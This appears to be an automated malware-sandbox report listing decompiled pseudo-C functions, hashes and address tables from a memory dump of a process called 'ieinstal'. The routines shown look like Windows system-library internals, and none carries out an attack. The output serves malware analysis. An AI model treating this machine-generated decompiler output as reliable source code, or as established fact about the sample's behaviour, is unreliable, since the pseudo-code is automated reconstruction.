                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                            • Instruction ID: 64cd572f85a38fc9d4525ca71be368756ea100a6dc4f64b73f1432c3217dcf73
                                                            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                            • Instruction Fuzzy Hash: 4B017CB3600AC4DFD722871ECE94F6B7BDDEB49690F0501A1E92ACBA95D728DC40C620
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED28ED6 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 54%
                                                            			E1ED28ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x1ed4d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E1EC77D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E1EC9B640(E1EC99AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                            0x1ed28ed6
                                                            0x1ed28ee5
                                                            0x1ed28eed
                                                            0x1ed28ef0
                                                            0x1ed28efa
                                                            0x1ed28f03
                                                            0x1ed28f0c
                                                            0x1ed28f15
                                                            0x1ed28f24
                                                            0x1ed28f27
                                                            0x1ed28f31
                                                            0x1ed28f43
                                                            0x1ed28f33
                                                            0x1ed28f3c
                                                            0x1ed28f3c
                                                            0x1ed28f4e
                                                            0x1ed28f4f
                                                            0x1ed28f51
                                                            0x1ed28f56
                                                            0x1ed28f69

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 47261cb331a7e02730f98537ec8adcc1b57a2305ba5293b0e2126b6dd2915f67
                                                            • Instruction ID: cb30e57c65982a9533644e4d1c7b9c931c14d98f2691044794af1654aaf02169
                                                            • Opcode Fuzzy Hash: 47261cb331a7e02730f98537ec8adcc1b57a2305ba5293b0e2126b6dd2915f67
                                                            • Instruction Fuzzy Hash: F4110C74A002599FDB04DFA9D841AAEF7F4FF08200F4442AAE518EB781EA34A940CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED28A62 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 54%
                                                            			E1ED28A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x1ed4d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E1EC77D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1EC9B640(E1EC99AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                            0x1ed28a62
                                                            0x1ed28a71
                                                            0x1ed28a79
                                                            0x1ed28a82
                                                            0x1ed28a85
                                                            0x1ed28a89
                                                            0x1ed28a8c
                                                            0x1ed28a8f
                                                            0x1ed28a92
                                                            0x1ed28a95
                                                            0x1ed28a9f
                                                            0x1ed28ab1
                                                            0x1ed28aa1
                                                            0x1ed28aaa
                                                            0x1ed28aaa
                                                            0x1ed28abc
                                                            0x1ed28abd
                                                            0x1ed28abf
                                                            0x1ed28ac4
                                                            0x1ed28ada

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 13ddb299f275b8a9e842a881e812246621c37e5633574f379b232c6f480ac66e
                                                            • Instruction ID: 0d09ea0a7b2540d094f9bc7791f3eefaeb87fc95d9c589840d1550cdc5dfb89c
                                                            • Opcode Fuzzy Hash: 13ddb299f275b8a9e842a881e812246621c37e5633574f379b232c6f480ac66e
                                                            • Instruction Fuzzy Hash: B1012C75A0025DAFCB04DFA9D9419EEB7B8EF58710F50456AF904E7341EB34A901CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC5DB60 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1EC5DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E1EC5DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E1EC5E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L1EC5E8B0(__ecx, _t14, 0xfff);
							L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                            0x1ec5db64
                                                            0x1ec5db66
                                                            0x1ec5db6b
                                                            0x1ec5dbaa
                                                            0x1ec5db71
                                                            0x1ec5db76
                                                            0x1ec5db7a
                                                            0x1ec5dba3
                                                            0x1ec5db7c
                                                            0x1ec5db87
                                                            0x1ec5db8b
                                                            0x1ecb4fa1
                                                            0x1ecb4fb3
                                                            0x1ecb4fb8
                                                            0x1ec5db91
                                                            0x1ec5db96
                                                            0x1ec5db98
                                                            0x1ec5db98
                                                            0x1ec5db8b
                                                            0x1ec5db7a
                                                            0x1ec5db9d
                                                            0x1ec5dba2

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                            • Instruction ID: b139860cb0933e2e1a0676d3846c3c6b45594f2407a941de2b2b784ba86bed19
                                                            • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                            • Instruction Fuzzy Hash: 37F0C2373017629FD3225B5A8C80B1BBAAB9F81AA1F160635F1049B348CE60880386E8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC5B1E1 Relevance: .0, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1EC5B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E1EC77D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E1EC77D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E1ECD7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                            0x1ec5b1e8
                                                            0x1ec5b1ea
                                                            0x1ec5b1f3
                                                            0x1ecb4a17
                                                            0x1ec5b1f9
                                                            0x1ec5b1f9
                                                            0x1ec5b1f9
                                                            0x1ec5b201
                                                            0x1ecb4a21
                                                            0x1ecb4a2e
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb4a3b
                                                            0x1ecb4a4d
                                                            0x1ecb4a3d
                                                            0x1ecb4a46
                                                            0x1ecb4a46
                                                            0x1ecb4a55
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec5b20a
                                                            0x1ec5b20a
                                                            0x1ec5b20a
                                                            0x1ec5b20a

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                            • Instruction ID: 39a0a2abb176dd9695d62de8c571b84c57e54ff54b7616388bf80859971d3288
                                                            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                            • Instruction Fuzzy Hash: D601AD326046C8ABD312865ACC04B5ABB9AFF41790F0906A1F9158B7A5EB79D8108729
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECEFE87 Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 46%
                                                            			E1ECEFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x1ed4d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E1EC77D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E1EC9B640(E1EC99AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                            0x1ecefe96
                                                            0x1ecefe9e
                                                            0x1ecefea1
                                                            0x1ecefead
                                                            0x1ecefeb3
                                                            0x1ecefeb9
                                                            0x1ecefec3
                                                            0x1ecefed5
                                                            0x1ecefec5
                                                            0x1ecefece
                                                            0x1ecefece
                                                            0x1ecefee0
                                                            0x1ecefee1
                                                            0x1ecefee3
                                                            0x1ecefee8
                                                            0x1ecefefb

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d1606806e0c1570e0aa9beec5ae0a62dcdd7f1226605fdb4e10e2738919a6ca
                                                            • Instruction ID: 35be2ab6f0866e0135d94d7bbefad4fad7852e70383b3d9ce4405942c27e4309
                                                            • Opcode Fuzzy Hash: 2d1606806e0c1570e0aa9beec5ae0a62dcdd7f1226605fdb4e10e2738919a6ca
                                                            • Instruction Fuzzy Hash: 96016274A0024DAFCB14DFA8D945A6EBBF4EF04300F144659A504EB382DA35E901CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED28F6A Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 48%
                                                            			E1ED28F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x1ed4d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E1EC77D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E1EC9B640(E1EC99AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                            0x1ed28f6a
                                                            0x1ed28f79
                                                            0x1ed28f81
                                                            0x1ed28f84
                                                            0x1ed28f8b
                                                            0x1ed28f91
                                                            0x1ed28f94
                                                            0x1ed28f9e
                                                            0x1ed28fb0
                                                            0x1ed28fa0
                                                            0x1ed28fa9
                                                            0x1ed28fa9
                                                            0x1ed28fbb
                                                            0x1ed28fbc
                                                            0x1ed28fbe
                                                            0x1ed28fc3
                                                            0x1ed28fd6

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 353aa657bf2b49eebae2a95c2ce9c0ea3c9914c45d5a83681238db7925e443f5
                                                            • Instruction ID: cb56dbc8c0af7dda21ec59c9c4119ea312eab6d544edabd3e33dd531ee5e1d42
                                                            • Opcode Fuzzy Hash: 353aa657bf2b49eebae2a95c2ce9c0ea3c9914c45d5a83681238db7925e443f5
                                                            • Instruction Fuzzy Hash: 14013174A0024DAFCB04DFA8D945AAEB7B4EF18300F504569B905EB380EB34EA00DB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED1131B Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 48%
                                                            			E1ED1131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x1ed4d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E1EC77D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1EC9B640(E1EC99AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                            0x1ed1131b
                                                            0x1ed1132a
                                                            0x1ed11330
                                                            0x1ed11336
                                                            0x1ed1133e
                                                            0x1ed11341
                                                            0x1ed11344
                                                            0x1ed1134f
                                                            0x1ed11361
                                                            0x1ed11351
                                                            0x1ed1135a
                                                            0x1ed1135a
                                                            0x1ed1136c
                                                            0x1ed1136d
                                                            0x1ed1136f
                                                            0x1ed11374
                                                            0x1ed11387

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c60afe82c671e3707defa24c7cdc1d40a0e6f73466780769eeeae2d54008f05
                                                            • Instruction ID: c8a51f2d8949ae5faed07f761d14190c041cf685b1ea8b9727af78161afe336a
                                                            • Opcode Fuzzy Hash: 1c60afe82c671e3707defa24c7cdc1d40a0e6f73466780769eeeae2d54008f05
                                                            • Instruction Fuzzy Hash: 34013C75A0124CAFCB04DFA9D945AAEB7F4FF08700F404559F845EB381EA34EA00DB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED11608 Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 46%
                                                            			E1ED11608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x1ed4d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E1EC77D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E1EC9B640(E1EC99AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                            0x1ed11608
                                                            0x1ed11617
                                                            0x1ed1161d
                                                            0x1ed11625
                                                            0x1ed11628
                                                            0x1ed1162b
                                                            0x1ed11636
                                                            0x1ed11648
                                                            0x1ed11638
                                                            0x1ed11641
                                                            0x1ed11641
                                                            0x1ed11653
                                                            0x1ed11654
                                                            0x1ed11656
                                                            0x1ed1165b
                                                            0x1ed1166e

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0eb0a71fe7613c62928c5775e88ad4cc4e297d5c845cb70cd867226319905e97
                                                            • Instruction ID: a86abb369eee2c7ff6023f44c66fa84179de4d71b23334d12037a199f7c7ca0c
                                                            • Opcode Fuzzy Hash: 0eb0a71fe7613c62928c5775e88ad4cc4e297d5c845cb70cd867226319905e97
                                                            • Instruction Fuzzy Hash: 82F06D75E00258EFCB04DFA9D845AAEB7F4EF18300F444569E905EB382EA34E900CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC7C577 Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1EC7C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E1EC7C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x1ec311cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E1ED288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                            0x1ec7c577
                                                            0x1ec7c57d
                                                            0x1ec7c581
                                                            0x1ec7c5b5
                                                            0x1ec7c5b9
                                                            0x1ec7c5ce
                                                            0x1ec7c5ce
                                                            0x1ec7c5ca
                                                            0x00000000
                                                            0x1ec7c5ca
                                                            0x1ec7c5c4
                                                            0x1ec7c5c8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec7c5ad
                                                            0x00000000
                                                            0x1ec7c5af

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 911490ab938265a5f25cc0bbd4df7d7416aafe1c6cdffb9c2b9bcceddf51043c
                                                            • Instruction ID: 988bcd53e29085a2d7bf3a6b7141a00176d51d8fee0fe66a6d866fbde15c73e4
                                                            • Opcode Fuzzy Hash: 911490ab938265a5f25cc0bbd4df7d7416aafe1c6cdffb9c2b9bcceddf51043c
                                                            • Instruction Fuzzy Hash: 5DF090B3D35AD39ED3A98B15C840F017BE59B1D770F914B67E40587149C7A6DC80E250
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC9927A Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 54%
                                                            			E1EC9927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L1EC74620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E1EC9FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E1EC992C6(_t11, _t14);
				}
				return _t11;
			}





                                                            0x1ec99295
                                                            0x1ec99299
                                                            0x1ec9929f
                                                            0x1ec992aa
                                                            0x1ec992ad
                                                            0x1ec992ae
                                                            0x1ec992af
                                                            0x1ec992b0
                                                            0x1ec992b4
                                                            0x1ec992bb
                                                            0x1ec992bb
                                                            0x1ec992c5

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                            • Instruction ID: cf875890f0c5fa8b4d9211a2b262ed8e153955605db68ffb0f91b09b1dbfff90
                                                            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                            • Instruction Fuzzy Hash: A4E02232340A816BE7118F0ACC80F9777ADEF82720F0445B8B9005E282CFE6EC0887A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED12073 Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 94%
                                                            			E1ED12073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E1ED0FD22(__ecx);
				_t19 =  *0x1ed4849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1ed48748; // 0x0
					if(__eflags <= 0) {
						E1ED11C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1ed48724 & 0x00000004;
							if(( *0x1ed48724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1ed48724; // 0x0
					return E1ED08DF1(__ebx, 0xc0000374, 0x1ed45890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                            0x1ed12076
                                                            0x1ed12078
                                                            0x1ed1207d
                                                            0x1ed12083
                                                            0x1ed120a4
                                                            0x1ed120aa
                                                            0x1ed120ac
                                                            0x1ed120b7
                                                            0x1ed120ba
                                                            0x1ed120bc
                                                            0x1ed120c9
                                                            0x1ed120c9
                                                            0x1ed120d0
                                                            0x1ed120d2
                                                            0x00000000
                                                            0x1ed120d2
                                                            0x1ed120be
                                                            0x1ed120c3
                                                            0x1ed120c5
                                                            0x1ed120c7
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed120c7
                                                            0x1ed120bc
                                                            0x1ed120d4
                                                            0x1ed12085
                                                            0x1ed12085
                                                            0x1ed120a3
                                                            0x1ed120a3

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 99365af0403b1da946249168fe86529449cba50db898b5fd97630c1d8ad22301
                                                            • Instruction ID: 43a07db33ce9a1c8c4a285eebdcb3814888ec43208e0adad3b3f7176c52de0d2
                                                            • Opcode Fuzzy Hash: 99365af0403b1da946249168fe86529449cba50db898b5fd97630c1d8ad22301
                                                            • Instruction Fuzzy Hash: AAF027BE4211E94BCB124F3470532C1BB92CB55950B1A1B89F4501FA44C536D983EA30
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED28D34 Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
